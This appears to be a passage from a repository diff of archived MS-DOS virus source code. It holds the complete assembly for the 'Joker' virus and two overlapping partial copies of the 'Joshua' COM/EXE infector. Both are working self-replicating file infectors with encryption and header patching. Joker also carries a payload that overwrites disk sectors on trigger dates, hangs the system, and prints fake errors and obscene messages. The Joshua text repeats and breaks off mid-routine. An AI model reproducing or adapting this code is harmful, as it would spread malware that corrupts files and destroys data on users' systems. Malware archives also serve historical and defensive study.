mov dx,80h ; Restore original DTA
cmp sp,ID-4 ; EXE or COM? ES,DS on stack
jz QUIT_EXE ; Pass control to host EXE
QUIT_COM: int 21h ; Call DOS to set DTA
retn ; Remember, 100h was on stack
QUIT_EXE: pop es ; Restore original ES
pop ds ; Restore original DS
int 21h ; Call DOS to set DTA
mov ax,es ; AX = begin of PSP segment
add ax,16 ; Add size of PSP to get CS
add word ptr cs:[bp+JMPSAVE2+2],ax ; Restore IP
add ax,word ptr cs:[bp+STACKSAVE2+2] ; Calculate SS
cli ; Clear interrupts
mov sp,word ptr cs:[bp+STACKSAVE2] ; Restore SP
mov ss,ax ; Restore SS
sti ; Set interrupts
db 0eah ; Jump SSSS:OOOO
JMPSAVE2 dd ? ; CS:IP for EXE return
STACKSAVE2 dd ? ; SS:SP for EXE return
JMPSAVE dd ? ; Original EXE CS:IP
STACKSAVE dd ? ; Original EXE SS:SP
CREATOR db '[Joshua]' ; That's me!
; DOS Findfirst / Findnext services
FINDFIRST: mov ah,4eh ; DOS find first service
mov cx,7 ; Choose files w/ any attribute
FINDNEXT: int 21h ; Call DOS to do it
jc END_SEARCH ; Quit if there are errors
; or no more files
; Ok, if I am here, then I found a possible victim. First open the file
; for read only.
mov al,0 ; DOS Open file, read only
call OPEN ; Open the file
; Read in the beginning bytes to check for previous infection and then close.
mov ah,3fh ; DOS Read file
lea dx,[bp+BUFFER] ; Save the original header
mov cx,24 ; Read 24 bytes
int 21h ; Call DOS to do it
mov ah,3eh ; DOS close file
int 21h ; Call DOS to do it
; Check if the file is an EXE.
CHECK_EXE: cmp word ptr [bp+BUFFER],'ZM' ; Is it an EXE?
jne CHECK_COM ; Nope, see if it's a COM
cmp word ptr [bp+BUFFER+16],ID; Is it already infected?
je ANOTHER ; Yep, so try another
jmp short INFECT_EXE ; We got one! Go infect it!
; Check if the file is COMMAND.COM
CHECK_COM: cmp word ptr [bp+DTA+35],'DN' ; Check for COMMAND.COM
jz ANOTHER ; If it is, try another file
; Now, check for previous infection by checking for our presence at
; the end of the file.
mov ax,word ptr [bp+DTA+26] ; Put total filesize in AX
cmp ax,(65535-(ENDHEAP-DECRYPT)); Check if too big
jle ANOTHER ; If so, try another
mov cx,word ptr [bp+BUFFER+1] ; Put jmp offset in CX
add cx,END_VIRUS-DECRYPT+3 ; Add virus size to jmp offset
cmp ax,cx ; Compare file size's
jnz INFECT_COM ; If healthy, go infect it
ANOTHER: mov ah,4fh ; Otherwise find another
jmp short FINDNEXT ; possible victim
END_SEARCH: retn ; No files found
;*** Subroutine INFECT_COM ***
INFECT_COM:
; Save the first three bytes of the COM file
lea si,[bp+BUFFER] ; Start of first 3 bytes
lea di,[bp+COM_START] ; Store them here
movsw ; Transfer the 3 bytes
movsb
; Calculate jump offset for header of victim so it will run virus first.
; AX has the filesize. Store new JMP and OFFSET in the buffer.
mov cx,3 ; No. bytes to write in header
sub ax,cx ; Filesize - jmp_offset
mov byte ptr [si-3],0e9h ; Store new JMP command
mov word ptr [si-2],ax ; plus offset
add ax,(103h+(START_VIRUS-DECRYPT)); New START_VIRUS OFFSET
push ax ; Save it for later
jmp DONE_INFECTION ; We're done!
;*** Subroutine INFECT_EXE ***
INFECT_EXE:
; Save original CS:IP and SS:SP.
les ax,dword ptr [bp+BUFFER+20] ; Get original CS:IP
mov word ptr [bp+JMPSAVE],ax ; Store IP
mov word ptr [bp+JMPSAVE+2],es ; Store CS
les ax,dword ptr [bp+BUFFER+14] ; Get original SS:SP
mov word ptr [bp+STACKSAVE],es ; Store SP
mov word ptr [bp+STACKSAVE+2],ax ; Store SS
; Get get the header size in bytes.
mov ax,word ptr [bp+BUFFER+8] ; Get header size
mov cl,4 ; Convert paragraphs to bytes
shl ax,cl ; Multiply by 16
xchg ax,bx ; Put header size in BX
; Get file size.
les ax,[bp+offset DTA+26] ; Get filesize to
mov dx,es ; DX:AX format
push ax ; Save filesize
push dx
sub ax,bx ; Subtract header size
sbb dx,0 ; from filesize
mov cx,16 ; Convert to SEGMENT:OFFSET
div cx ; form
; Store new entry point (CS:IP) in header.
mov word ptr [bp+BUFFER+20],dx; Store IP
mov word ptr [bp+BUFFER+22],ax; Store CS
add dx,START_VIRUS-DECRYPT ; New START_VIRUS offset
mov bx,dx ; Hold it for now
; Store new stack frame (SS:SP) in header.
mov word ptr [bp+BUFFER+14],ax; Store SS
mov word ptr [bp+BUFFER+16],ID; Store SP
pop dx ; Get back filesize
pop ax
add ax,END_VIRUS-START_VIRUS ; Add virus size
adc dx,0 ; to filesize
push ax ; Save AX
mov cl,9 ; Divide AX
shr ax,cl ; by 512
ror dx,cl
stc ; Set carry flag
adc dx,ax ; Add with carry
pop ax ; Get back AX
and ah,1 ; Mod 512
; Store new filesize in header.
mov word ptr [bp+BUFFER+4],dx ; Store new filesize
mov word ptr [bp+BUFFER+2],ax
push cs ; Restore ES
pop es
mov cx,24 ; No. bytes to write in header
push bx ; Save START_VIRUS offset
; Write virus to victim and restore the file's original timestamp, datestamp,
; and attributes. These values were stored in the DTA by the
; Findfirst / Findnext services.
DONE_INFECTION:
push cx ; Save no. bytes to write
xor cx,cx ; Clear attributes
call SET_ATTR ; Set attributes
mov al,2 ; DOS open file for read/write
call OPEN ; Open the file
; Write the new header at the beginning of the file.
mov ah,40h ; DOS write to file
pop cx ; Number of bytes to write
lea dx,[bp+BUFFER] ; Point to the bytes to write
int 21h ; Call DOS to do it
; Move to end of file.
mov ax,4202h ; DOS set read/write pointer
xor cx,cx ; Set offset move to zero
cwd ; Equivalent to xor dx,dx
int 21h ; Call DOS to do it
; Append virus to end of file.
mov ah,2ch ; DOS get time
int 21h ; Call DOS to do it
mov [bp+KEY],dx ; Save sec + 1/100 sec
; as the new KEY
lea di,[bp+APPEND] ; to the heap
mov cx,START_VIRUS-DECRYPT ; Number of bytes to move
mov al,53h ; Push BX and store it
stosb ; in the append routine
lea si,[bp+DECRYPT] ; Move Crypt routines
push si ; Save SI
push cx ; Save CX
rep movsb ; Transfer the data
lea si,[bp+WRITE_START] ; Now copy the write
mov cx,WRITE_END-WRITE_START ; routine to the heap
rep movsb ; Transfer the data
pop cx ; Get back
pop si ; CX and SI
rep movsb ; Recopy Crypt routine
mov ax,0c35bh ; Tack a POP BX and
stosw ; RETN on the end
pop ax ; New START_VIRUS offset
mov word ptr [bp+DECRYPT+1],ax; Store new offset
call APPEND ; Write the file
; Restore original creation date and time.
mov ax,5701h ; DOS set file date & time
mov cx,word ptr [bp+DTA+22] ; Set time
mov dx,word ptr [bp+DTA+24] ; Set date
int 21h ; Call DOS to do it
; Close the file.
mov ah,3eh ; DOS close file
int 21h ; Call DOS to do it
; Restore original file attributes.
mov cx,word ptr [bp+DTA+21] ; Get original file attribute
call SET_ATTR ; Set attribute
pop bx ; Take CALL off stack
; ****** B O M B S E C T I O N ******
; Check to see if the virus is ready to activate.
; Put all activation tests and bombs here.
CONDITIONS: ; mov ah,2ah ; DOS get date
; int 21h ; Call DOS to do it
; cmp dx,1001h ; Check for Oct 1st
; jl BOMB_DONE ; Not time yet
; mov ah,2ch ; DOS get time
; int 21h ; Call DOS to do it
; cmp cl,25h ; Check for 25 min past
; jl BOMB_DONE ; Not time yet
BOMB: mov ah,3h ; BIOS find cursor position
mov bh,0 ; Video page 0
int 10h ; Call BIOS to do it
push dx ; Save original Row and Column
mov cx,6 ; Number of lines to print
lea si,[bp+VERSE] ; Location of VERSE
mov dx,080ah ; Row and Column of output
PRINTLOOP: mov ah,2h ; BIOS set cursor
int 10h ; Set cursor
push dx ; Save Row and Column
mov ah,9h ; DOS print string
mov dx,si ; Location of VERSE
int 21h ; Call DOS to print it
pop dx ; Get Row and Column
inc dh ; Increment Row
add si,54 ; Go to next line of VERSE
loop PRINTLOOP ; Print all lines
mov ah,00h ; Read character from keybd
int 16h
pop dx ; Get original Row Column
mov ah,2h ; BIOS set cursor
int 10h ; Call BIOS to do it
BOMB_DONE: jmp QUIT ; Go back to host program
VERSE: db 'ÖÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ·$'
db 'º Guess what ??? º$'
db 'º You have been victimized by a virus!!! Do not º$'
db 'º try to reboot your computer or even turn it º$'
db 'º off. You might as well read this and weep! º$'
db 'ÓÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄĽ',7,7,'$'
; Write routine to append the virus to the end of the file.
WRITE_START:
pop bx ; Get back file handle
push bx ; Save it again
mov ah,40h ; DOS write to file
mov cx,END_VIRUS-DECRYPT ; Length of virus
lea dx,[bp+DECRYPT] ; Start from beginning of virus
int 21h ; Call DOS to do it
WRITE_END:
; New INT 24h handler.
NEWINT24: mov al,3 ; Fail call
iret ; Return
;*** Subroutine OPEN ***
; Open a file. Takes AL as parameter.
OPEN proc near
mov ah,3dh ; DOS open file, read/write
lea dx,[bp+DTA+30] ; Point to filename we found
int 21h ; Call DOS to do it
xchg ax,bx ; Put file handle in BX
retn ; Return
OPEN endp
;*** Subroutine SET_ATTR ***
; Takes CX as a parameter
SET_ATTR proc near
mov ax,4301h ; DOS change file attr
lea dx,[bp+DTA+30] ; Point to file name
int 21h ; Call DOS
retn ; Return
SET_ATTR endp
; This area will hold all variables to be encrypted
COM_MASK db '*.com',0 ; COM file mask
EXE_MASK db '*.exe',0 ; EXE file mask
DOTDOT db '..',0 ; Go up one directory
COM_START db 0cdh,20h,0 ; Header for infected file
BACKSLASH db '\' ; Backslash for directory
START endp
END_VIRUS equ $ ; Mark end of virus code
; This data area is a scratch area and is not included in virus code.
ORIG_DIR db 64 dup(?) ; Holds original directory
OLDINT24 dd ? ; Storage for old INT 24 vector
BUFFER db 24 dup(?) ; Read buffer and EXE header
DTA db 43 dup(?) ; New DTA location
APPEND: db (START_VIRUS-DECRYPT)*2+(WRITE_END-WRITE_START)+3 dup(?)
ENDHEAP:
end MAIN
MSDOS/J-Index/Virus.MSDOS.Unknown.joker.asm
+541
View File
@@ -0,0 +1,541 @@
title " Joker! virus. Written by The BOOT SECTOR Infector ... "
;
; Joker - This is a remake of the deceased "Joker/Jocker" virus. The original
; had multiple programming errors in it that kept it from replicating.
; My version is much more successful.
;
page 255,80
code segment word public 'code'
assume cs:code,ds:code
org 100h
main proc;edure
;EQUates...
idc equ 69h ;ID character - (note: 69)
cr equ 13 ;ASCII for carriage return
lf equ 10 ;ASCII for line feed
;End codes. These determine what happens after the string is displayed.
terminate equ 0 ;Terminate program after display
halt equ 1 ;Cause the system to hang after display
SimulateCritErr equ 2 ;Simulate the critical error handler
return2host equ 3 ;Resume program immediately
FlashFloppy equ 4 ;Wait for a key, then reset Drive A:
WaitKey equ 5 ;Wait for a key, then resume program
PauseKey equ 6 ;Same thing, but uses a pause message
StackError equ 7 ;Cause a stack overflow (halts system)
tof: ;Top-Of-File
jmp begin ;Skip over program
idchar: db idc ;ID character
HostProgram: nop ;First run copy only!
nop ;First run copy only!
first_four: nop ;First run copy only!
address: int 20h ;First run copy only!
check: nop ;First run copy only!
begin: call nextline ;Push IP+3 onto stack
nextline: pop bp ;mov bp,ip
sub bp,offset nextline ;bp=disp. for mem locs
push ax ;Save AX
call cryptor ;Decrypt
jmp short retloc ;Continue program
cryptor: mov al,[bp+offset encrypt_val] ;encrypt val
lea si,[bp+offset toec] ;Top Of Encrypted Code
mov cx,offset eoec-offset toec ;Length of " "
cryptorloop: xor [si],al ;en/de crypt
rol al,cl ;change code #
inc si ;Next char please!
loop cryptorloop ;loop if necessary
ret ;Return to caller
infect: call cryptor ;Encrypt code
pop cx ;Restore CX for INT 21
int 21h ;Call DOS
call cryptor ;Decrypt code
ret ;Go back
toec:;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄTop Of Encrypted Code
InfectIt: push cx ;Save CX for sub
jmp infect
retloc: pop ax ;Restore AX
xor di,di ;DI = 0
cli ;Disable interrupts
mov ss,di ;Set up stack at:
mov sp,2F0h ; 0000:02F0
sti ;Enable interrupts
mov si,96h ;Vector for INT 24h
mov bx,ss:[si] ;BX = offset in segment
mov cx,ss:[si+2] ;CX = segment
lea dx,[bp+offset int24handler] ;CS:DX -} local handler
mov ss:[si],DX ;Save offset
mov ss:[si+2],cs ;Save segment
mov si,es:[di+2F8h] ;Check operation mode
cmp si,4643h ;'CF' if already TSRed
jne GoOn ;Nope, jmp
jmp return ;Yes, don't do anything
GoOn: mov cs:[di+4Ch],bx ;use unused part of PSP
mov cs:[di+4Eh],cx ; to save BX and CX
push cs ;Copy CS ...
pop es ; ... to DS
mov byte ptr [bp+offset infected],0 ;Reset infection count
mov byte ptr [bp+offset max2kill],3 ;Stop after 3 or less
GoOn2: lea si,[bp+offset first_four] ;Original first 4 bytes
mov di,offset tof ;TOF never changes
cld ;Read left-to-right
movsw ;Copy the 4 bytes
movsw ;Copy the 4 bytes
mov ah,1Ah ;Set DTA address ...
lea dx,[bp+offset DTA] ; ... to *our* DTA
int 21h ;Call DOS to set DTA
mov ah,4Eh ;Find First ASCIIZ
lea dx,[bp+offset filespec] ;DS:DX -} '*.COM',0
lea si,[bp+offset filename] ;Point to file
push dx ;Save DX
jmp short continue ;Continue...
return: mov ah,1ah ;Set DTA address ...
mov dx,80h ; ... to default DTA
int 21h ;Call DOS to set DTA
xor di,di ;DI= 0
mov es,di ;ES= 0
mov si,96h ;Vector for INT 24h
mov bx, cs:[di+4Ch] ;Restore from saved BX
mov word ptr es:[si+0], bx ;Place back into vector
mov cx, cs:[di+4Eh] ;Restore from saved CX
mov word ptr es:[si+2], cx ;Place back into vector
push cs ;Move CS ...
pop es ; ... to ES
mov ax,[bp+offset SavedAX] ;Restore AX
xor bx,bx ;BX= 0
mov cx,bx ;CX= 0
mov dx,cx ;DX= 0
mov si,dx ;SI= 0
mov di,si ;DI= 0
mov sp,0FFFEh ;SP= FFFEh (normal)
mov bp,100h ;BP= 100h (RETurn addr)
push bp ; Put on stack
mov bp,ax ;BP= 0
ret ;JMP to 100h
nextfile: or bx,bx ;Did we open the file?
jz skipclose ;No, so don't close it
mov ah,3Eh ;Close file
int 21h ;Call DOS to close it
xor bx,bx ;Set BX back to 0
skipclose: mov ah,4Fh ;Find Next ASCIIZ
continue: pop dx ;Restore DX
push dx ;Re-save DX
xor cx,cx ;CX= 0
xor bx,bx
int 21h ;Find First/Next
jnc skipjmp
jmp NoneLeft ;Out of files
skipjmp: mov ax,3D02h ;open file
mov dx,si ;point to filespec
int 21h ;Call DOS to open file
jc nextfile ;Next file if error
mov bx,ax ;get the handle
mov ah,3Fh ;Read from file
mov cx,4 ;Read 4 bytes
lea dx,[bp+offset first_four] ;Read in the first 4
int 21h ;Call DOS to read
cmp byte ptr [bp+offset check],idc ;Already infected?
je nextfile ;Yep, try again ...
;NOTE: Delete the two lines above if you want it to re-infected programs.
cmp byte ptr [bp+offset first_four],77 ;Mis-named .EXE?
je nextfile ;Yep, maybe next time!
mov ax,4202h ;LSeek to EOF
xor cx,cx ;CX= 0
xor dx,dx ;DX= 0
int 21h ;Call DOS to LSeek
cmp ah,0F8h ;Longer than 62K?
ja nextfile ;Yep, try again...
mov [bp+offset addr],ax ;Save call location
mov ah,40h ;Write to file
mov cx,4 ;Write 4 bytes
lea dx,[bp+offset first_four] ;Point to buffer
int 21h ;Save the first 4 bytes
mov ah,[bp+offset encrypt_val] ;Get code number
inc ah ;add 1
adc ah,0 ;increment if it's zero
mov [bp+offset encrypt_val],ah ;Save new code number
mov ah,40h ;Write to file
mov cx,offset eof-offset begin ;Length of target code
lea dx,[bp+offset begin] ;Point to virus start
call InfectIt ;Exempt from encryption
ComeBackHere: mov ax,4200h ;LSeek to TOF
xor cx,cx ;CX= 0
xor dx,dx ;DX= 0
int 21h ;Call DOS to LSeek
mov ax,[bp+offset addr] ;Retrieve location
inc ax ;Adjust location
mov [bp+offset address],ax ;address to call
mov byte ptr [bp+offset first_four],0E9h ;JMP rel16 inst.
mov byte ptr [bp+offset check],idc ;EOFMARK
mov ah,40h ;Write to file
mov cx,4 ;Write 4 bytes
lea dx,[bp+offset first_four] ;4 bytes are at [DX]
int 21h ;Write to file
inc byte ptr [bp+offset infected] ;increment counter
dec byte ptr [bp+offset max2kill] ;decrement counter
jz TheEnd ;If 0 then End
inc byte ptr [bp+offset encrypt_val] ;change code #
adc byte ptr [bp+offset encrypt_val],0 ;adjust if 0
jmp nextfile ;Next victim!
NoneLeft: cmp byte ptr [bp+offset infected],3 ;At least 3 infected?
jae TheEnd ;The party's over!
mov di,100h ;DI= 100h
cmp word ptr [di],20CDh ;an INT 20h?
je TheEnd ;Don't go to prev. dir.
lea dx,[bp+offset prevdir] ;'..'
mov ah,3Bh ;Set current directory
int 21h ;CHDIR ..
jc TheEnd ;We're through!
mov ah,4Eh
jmp continue ;Start over in new dir
TheEnd: xor di,di ;DI= 0
mov es,di ;ES= 0
mov ah,2ah ;Get date
int 21h ;Do it
cmp dl,4 ;4th of the month?
jne test2 ;Nope, second test
cmp dh,7 ;July?
jne test2 ;Nope, second test
xor ax,ax ;Sector 0
jmp Kill ;Kill the disk now...
test2: mov ah,2ch ;Get time
int 21h ;Do it
or cl,cl ;On the hour? (x:00 xM)
jnz GiveUp ;Return to program
cmp ch,6 ;Midnight to 5 AM ???
jnl GiveUp ;Return to program
add cl,ch ;Add first number
mov ax,cx ;Transfer to AX
cbw ;Zero out AH
add al,dh ;Add DL to AL
adc al,dl ;Add DL and carry flag
adc ah,0 ;Add carry to AH
or ax,ax ;AX = 0 ???
jnz Kill ;Kill the disk now...
inc ax ;Well, adjust first...
Kill: mov dx,ax ;Sector number
mov cx,1 ;One at a time....
xor bx,bx ;Point at PSP
mov ah,19h ;Get current disk
int 21h ;Call DOS to ^
int 26h ;Now kill the disk
GiveUp: mov bx,offset message_table ;point to table
mov ah,2ch ;Get time
int 21h ;Call DOS to ^
inc dh ;(0-59)
timeloop: cmp dh,msgs ;mapped yet?
jl timedone ;Yes, jump
sub dh,msgs ;try to map it
jmp short timeloop ;and check out work
timedone: mov al,dh ;AL gets msg #
mov cl,al ;Save in CL for CritErr
cbw ;AH gets 0
shl ax,1 ;AX = AX * 2
add bx,ax ;BX = index
mov si,[bx] ;SI points to string
mov ch,[si-1] ;CH is technique #
mov dx,si ;DX points to string
mov ah,9 ;Display string
int 21h ;Call DOS to ^
cmp ch,terminate ;Terminate program?
je TerminateProg ;Nope, next test
cmp ch,halt ;Halt program?
je $ ;Hang system if ch=halt
cmp ch,SimulateCritErr ;Simulate CritErr?
je simulate ;yes, go do it
cmp ch,Return2host ;Return to host?
je ResumeProgram ;yes, go do it
cmp ch,FlashFloppy ;Flash drive A:?
je FlashFlop ;Yes, go do it
cmp ch,WaitKey ;Wait for keypress?
je zwait ;Yes, go do it
cmp ch,PauseKey ;Pause message w/ wait?
je zpause ;Yes, go do it
cmp ch,StackError ;Stack overflow?
je StackErr ;Yes, go do it
;Invalid code, assume Return2host
ResumeProgram: jmp return ;Return to caller
StackErr: call $ ;Cause stack overflow
TerminateProg: int 20h ;Yep, all done!
simulate: lea dx,[bp+offset ARIFmsg] ;Abort, Retry ...
mov ah,9 ;Print string
int 21h ;Call DOS to ^
mov ah,1 ;Input a char
int 21h ;Call DOS to ^
lea dx,[bp+offset crlf] ;crlf
mov ah,9 ;Print string
int 21h ;Call DOS to ^
cmp al,'a' ;Uppercase?
jb uppercase ;Nope, jump
sub al,' ' ;Yes, make uppercase
uppercase: cmp al,'A' ;Abort?
je terminateprog ;Yep, go do it.
cmp al,'R' ;Retry?
jne zskip ;skip over "retry" code
lea dx,[bp+offset crlf] ;Point to crlf
mov ah,9 ;Print string
int 21h ;Call DOS to ^
mov dh,cl ;Restore DH from CL
jmp timedone ;Reprint error
zskip: cmp al,'I' ;Ignore?
je ResumeProgram ;Return to host program
cmp al,'F' ;Fail?
jne simulate ;Invalid response
lea dx,[bp+offset fail24] ;Point to fail string
mov ah,9 ;Print string
int 21h ;Call DOS to ^
int 20h ;Terminate program
FlashFlop: mov ah,1 ;Wait for keypress
int 21h ;Call DOS to ^
xor ax,ax ;Drive A:
mov cx,1 ;Read 1 sector
mov dx,ax ;Start at boot sector
lea bx,[bp+offset boot_sector] ;BX points to buffer
int 25h ;Flash light on A:
jmp short ResumeProgram ;Resume if no error
zpause: lea dx,[bp+offset pause] ;Point to pause message
mov ah,9 ;Print string
int 21h ;Call DOS to ^
zwait:
mov ah,1 ;Wait for keypress
int 21h ;Call DOS to ^
jmp short ResumeProgram ;Go on...
ARIFmsg db cr,lf,'Abort, Retry, Ignore, Fail?$'
fail24 db cr,lf,cr,lf,'Fail on INT 24'
crlf db cr,lf,'$'
message_table:
dw offset msg1
dw offset msg2
dw offset msg3
dw offset msg4
dw offset msg5
dw offset msg6
dw offset msg7
dw offset msg8
dw offset msg9
dw offset msg10
dw offset msg11
dw offset msg12
dw offset msg13
dw offset msg14
dw offset msg15
dw offset msg16
dw offset msg17
dw offset msg18
dw offset msg19
dw offset msg20
msgs db 20
; I tried to make it as simple as possible to change the messages
; and add/delete them. Each message is in the format:
;
; db [technique]
;[label] db [Text]
;
; Where [technique] is one of the 8 codes shown at the beginning of
; this file (terminate, halt, etc.). This determines what the virus
; should do after printing the message.
; [label] is in the form "msg##" where ## is a number from 1 to
; "msgs". "msgs" is defined immediately before this
; comment block.
; [text] is a combination of text and ASCII codes, terminated by
; either a '$' or a ,36.
;
; If you change the number of messages the virus has, you should also
; add/remove lines from the offset table and change the "msgs"
; data byte appropriately. Let's say for instance that you want
; to remove "Program too big to fit in memory.":
; 1) Delete the line(s) with the message and the line
; immediately before it.
; 2) Move message #20 up to message #2's position and
; change its label from "msg20" to "msg2".
; 3) Delete the line "dw offset msg20" from the offset
; table.
; 4) Change the line before this comment block to:
; "msgs db 19"
;
; Later!
; -The BOOT SECTOR Infector ...
;
db FlashFloppy ;Waits for key, then flashes drive A:
msg5 db 'I',39,'m hungry! Insert PIZZA & BEER into drive A: and',cr,lf
pause db 'Strike any key when ready... $'
db SimulateCritErr ;Prints ARIF message and responds appropriately
msg1 db 'Impotence error reading user',39,'s dick$'
db terminate ;Ends the program immediately
msg2 db 'Program too big to fit in memory',cr,lf,'$'
db halt ;Halts the system
msg3 db 'Cannot load COMMAND, system halted',cr,lf,'$'
db terminate ;Ends the program immediately
msg4 db 'I',39,'m sorry, Dave.... but I',39,'m afraid'
db ' I can',39,'t do that!',cr,lf,'$'
db WaitKey ;Waits for a keypress, then runs the program
msg6 db 'Format another? (Y/N)? $'
db StackError ;Generates a stack overflow (halts the system)
msg7 db 'Damn it! I told you not to touch that!$'
db terminate ;Ends the program immediately
msg8 db 'Suck me!',cr,lf,'$'
db SimulateCritErr ;Prints ARIF message and responds appropriately
msg9 db 'Cocksucker At Keyboard error reading device CON:$'
db terminate ;Ends the program immediately
msg10 db 7,cr,cr,cr,7,cr,cr,cr,7,cr,cr,cr,lf
db 'I',39,'m sorry, but your call cannot be completed as dialed.'
db cr,lf,'Please hang up & try your call again.',cr,lf,'$'
db terminate ;Ends the program immediately
msg11 db 'No!',cr,lf,cr,lf,'$'
db halt ;Halts the system
msg12 db 'Panic kernal mode interrupt$'
db WaitKey ;Waits for a keypress, then runs the program
msg13 db 'CONNECT 1200«',cr,lf,cr,lf,'$'
db return2host ;Runs host program immediately
msg14 db 'Okay, okay! Be patient! ...',cr,lf,'$'
db terminate ;Ends the program immediately
msg15 db 'And if I refuse?',cr,lf,'$'
db return2host ;Runs host program immediately
msg16 db 'Fuck the world and its followers!',cr,lf,'$'
db return2host ;Runs host program immediately
msg17 db 'You are pathetic, man... you know that?',cr,lf,'$'
db terminate ;Ends the program immediately
msg18 db 'Cum on! Talk DIRTY to me !!!',cr,lf,'$'
db terminate ;Ends the program immediately
msg19 db 'Your coprocessor wears floppy disks!',cr,lf,'$'
db PauseKey ;Waits for keypress (SAKWR), then runs host prg
msg20 db 'Joker! ver àà by TBSI!',cr,lf
db 'Remember! EVERYTHING',39,'s bigger in Texas!',cr,lf,'$'
int24handler: xor al,al ;Ignore the error
iret ;Interrupt return
filespec: db '*.COM',0 ;File specification
prevdir: db '..',0 ;previous directory
max2kill db 3 ;max. files to infect
eoec:;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄEnd Of Encrypted Code
VersionNumber dw 100h ;Version 1.00
encrypt_val db 0 ;1st-run copy only
; None of this information is included in the virus's code. It is only used
; during the search/infect routines and it is not necessary to preserve it
; in between calls to them.
eof:
DTA:
db 21 dup (?) ;internal search's data
attribute db ? ;attribute
file_time db 2 dup (?) ;file's time stamp
file_date db 2 dup (?) ;file's date stamp
file_size db 4 dup (?) ;file's size
filename db 13 dup (?) ;filename
SavedAX dw ? ;Used to save AX
infected db ? ;infection count
addr dw ? ;Address
boot_sector:
main endp;rocedure
code ends;egment
end main
MSDOS/J-Index/Virus.MSDOS.Unknown.joshua.asm
+484
View File
@@ -0,0 +1,484 @@
;******************************************************************
;* *
;* My First Virus, a simple non-overwriting COM and EXE *
;* infector. *
;* by, Joshua *
;* *
;******************************************************************
ID = 'SS' ; My ID
.model tiny ; Memory model
.code ; Start Code
org 100h ; Start of COM file
MAIN: db 0e9h,00h,00h ; Jmp START_VIRUS
START proc near
DECRYPT: mov bx,offset START_VIRUS ; Find out our offset
mov cx,(END_VIRUS-START_VIRUS)/2
DECRYPT_LOOP: db 2eh,81h,37h ; XOR [BX],xxxx
KEY dw 0 ; Crypt KEY
add bx,2 ; Increment offset
dec cx ; Decrement counter
jnz DECRYPT_LOOP ; Continue until done
START_VIRUS:
call FIND_OFFSET ; Real start of virus
; Calculate change in offset from host program.
FIND_OFFSET: pop bp ; BP holds current IP
sub bp, offset FIND_OFFSET ; Calculate net change
; Change BP to start of
; virus code
; Capture INT 24h Critical error handler.
push es ; Save ES
mov ax,3524h ; DOS get interupt vector
int 21h ; Call DOS to do it
mov word ptr [bp+OLDINT24],bx ; Save old INT 24h
mov word ptr [bp+OLDINT24+2],es ; vector
mov ah,25h ; DOS set interupt vector
lea dx,[bp+NEWINT24] ; Address of new interupt
int 21h ; Call DOS to do it
pop es ; Restore ES
; Find out what kind of program I am, COM or EXE, by checking stack pointer.
; This is where I store my ID in an EXE infection.
cmp sp,ID ; COM or EXE?
je RESTORE_EXE ; I am an EXE file
; Restore original bytes to the COM program.
RESTORE_COM: lea si,[bp+COM_START] ; Restore original 3 bytes
mov di,100h ; to 100h, start of file
push di ; Jmp to 100h when done
movsw ; Copy 3 bytes
movsb
jmp short RESTORE_DONE
; Restore original bytes to the EXE program.
RESTORE_EXE: push ds ; Save original DS
push es ; Save original ES
push cs ; Set DS = CS
pop ds
push cs ; Set ES = CS
pop es
lea si,[bp+JMPSAVE] ; Copy original CS:IP and
lea di,[bp+JMPSAVE2] ; SS:SP for return
movsw ; Copy 8 bytes
movsw
movsw
movsw
; Change the DTA from the default so FINDFIRST/FINDNEXT won't destroy
; original command line parameters.
RESTORE_DONE: lea dx,[bp+DTA] ; Point to new DTA area
mov ah,1ah ; DOS set DTA
int 21h ; Call DOS to do it
; Save original directory.
mov ah,47h ; DOS get current directory
lea si,[bp+ORIG_DIR] ; Store it here
mov dl,0 ; Current drive
int 21h ; Call DOS to do it
; Search for a file to infect.
SEARCH: lea dx,[bp+EXE_MASK] ; Search for any EXE file
call FINDFIRST ; Begin search
lea dx,[bp+COM_MASK] ; Search for any COM file
call FINDFIRST ; Begin search
mov ah,3bh ; DOS change directory
lea dx,[bp+DOTDOT] ; Go up one direcotry
int 21h ; Call DOS to do it
jnc SEARCH ; Go look for more files
; Restore default DTA, original directory, and pass control back to
; original program.
QUIT: mov ah,3bh ; DOS change directory
lea dx,[bp+ORIG_DIR-1] ; Point to original directory
int 21h ; Call DOS to do it
push ds ; Save DS
mov ax,2524h ; DOS set interupt vector
lds dx,[bp+OLDINT24] ; Restore INT 24h
int 21h ; Call DOS to do it
pop ds ; Restore DS
mov ah,1ah ; DOS set DTA
mov dx,80h ; Restore original DTA
cmp sp,ID-4 ; EXE or COM? ES,DS on stack
jz QUIT_EXE ; Pass control to host EXE
QUIT_COM: int 21h ; Call DOS to set DTA
retn ; Remember, 100h was on stack
QUIT_EXE: pop es ; Restore original ES
pop ds ; Restore original DS
int 21h ; Call DOS to set DTA
mov ax,es ; AX = begin of PSP segment
add ax,16 ; Add size of PSP to get CS
add word ptr cs:[bp+JMPSAVE2+2],ax ; Restore IP
add ax,word ptr cs:[bp+STACKSAVE2+2] ; Calculate SS
cli ; Clear interrupts
mov sp,word ptr cs:[bp+STACKSAVE2] ; Restore SP
mov ss,ax ; Restore SS
sti ; Set interrupts
db 0eah ; Jump SSSS:OOOO
JMPSAVE2 dd ? ; CS:IP for EXE return
STACKSAVE2 dd ? ; SS:SP for EXE return
JMPSAVE dd ? ; Original EXE CS:IP
STACKSAVE dd ? ; Original EXE SS:SP
CREATOR db '[Joshua]' ; That's me!
; DOS Findfirst / Findnext services
FINDFIRST: mov ah,4eh ; DOS find first service
mov cx,7 ; Choose files w/ any attribute
FINDNEXT: int 21h ; Call DOS to do it
jc END_SEARCH ; Quit if there are errors
; or no more files
; Ok, if I am here, then I found a possible victim. First open the file
; for read only.
mov al,0 ; DOS Open file, read only
call OPEN ; Open the file
; Read in the beginning bytes to check for previous infection and then close.
